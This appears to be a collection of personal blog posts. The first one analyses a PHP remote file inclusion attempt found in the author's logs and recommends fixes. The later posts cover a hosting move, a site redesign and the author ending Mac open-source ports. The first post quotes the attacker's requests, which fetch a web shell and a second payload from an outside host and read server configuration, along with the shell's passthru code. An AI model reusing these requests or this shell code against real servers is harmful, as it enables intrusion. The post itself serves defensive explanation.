While browsing my logs today, I discovered someone attempting to exploit PHP’s fopen() support for URLs , This specific form of expoit dates back to at least 2003.

The relevent information (from the cached page above – it doesn’t work here, so all you’d see was the first negated attempt):

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/usr/local/apache/conf&cmd=cat%20httpd.conf HTTP/1.1”

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/somewhere/writeable&cmd=wget%20http://www.havenard.net/havenard/4843term.txt HTTP/1.1”

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/somewhere/writeable&cmd=mv%204843term.txt%20terminal.php HTTP/1.1”

So, I looked at the script that was being linked to (as a text file, from a Geocities site; which still has ‘blocking’ disabled for text files – for some legacy reason). Below follows some of the code:

if (!empty($cmd)) { @passthru(”$cmd 2>&1”); $output = ob_get_contents(); if (!empty($output)) echo str_replace(”>”, ”>”, str_replace(”<”, ”<”, $output)); }

As you can see, this script is essentially just a wrapper for exec, using the syntax of a few parameters passed within $_GET[“cmd”].. only, not quite that smart.

It’s incredibly simple, old, and, well, sadly quite effective – many people still don’t secure their site, and blindly write code which works as the following:

if ( ! $var ) $var = “var”;
require(”$var.html”);

The above code is beyond bad. For one, it doesn’t define a local path, which could easily be fixed with:

require(”./$var.html”); (although, I still don’t agree with this method – and this STILL isn’t failsafe.)

I hate global variables, but once you parse your config, you can read the whole thing into an array of a single variable, which you don’t expose – except where you have to.

This is also pretty messy: It allows you to only access one global variable; however, it discloses everything in it’s array, which I consider to be bogus.

Protip: If you don’t need to open files from an external site (which you shouldn’t need to do.. and if you do, use sockets, or a PEAR library), turn off url access in fopen(). This is configurable in php.ini.

I’ve moved from my hosting with ICDSoft in China to ICDSoft’s USA colocation.

Things were updated in nameservice by myself in parallel with the move; anyone who cached (viewed) my page within the last few hours may have up to 48 hours until it updates on their ISP’s nameserver, but there IS a forward in place to the new location with an alternative name – CSS will be broken, and the site will be ugly, but it will still be functional.

Thanks for your swift, excellent service, ICDSoft .

[Update: Everything should be seeing the ‘new’ host, and yes, it may appear ‘faster’.]

Please pardon the dust; I’ve moved out of my old software base into an entirely new, redesigned (if not prettier) system.

I have converted, and imported all of my existing articles, but there has been no easy way to (re)classify them, as they’re entirely incompatible data types. I’ve manually updated the last fifty articles, but note that browsing by article type is not yet reflective of actual content.

As I am no longer actively maintaining open source software, the old posts will eventually be reclassified as legacy and deprecated; but left for the annals of time, and those searching for information I’ve uncovered in the past.

Yes, you’ve read that right. I will no longer offer Mac OS X ports, builds, or other assistance with my own open source based efforts.

This has been a difficult decision, however, I can no longer afford the time or bandwidth once dedicated to these projects.

If you wish to take over as maintainer of any of my existing code, please contact me, and the original authors (where applicable); I’ll be more than happy to offer my existing build structure with all dependencies, and when necessary, my personal build notes and GNU Patch unified diffs.

I have notified the authors of my ported software, and will continue to host this unsupported software through March, 2006.

Update: MKVToolNix, and OGMTools have found a new home. DOSBox is moving back in-house, and the Mac port of Bliss shall pass on with my silly little ‘speak’ utility.

Years ago – back in the OS9 days, I purchased a license for Candy Crisis. It’s followed me, even though I’ve had to request a new serial number for it.

I decided to take a look if it was still around. Even better. It’s now free!

On behalf of many other Columns addicts – thank you John!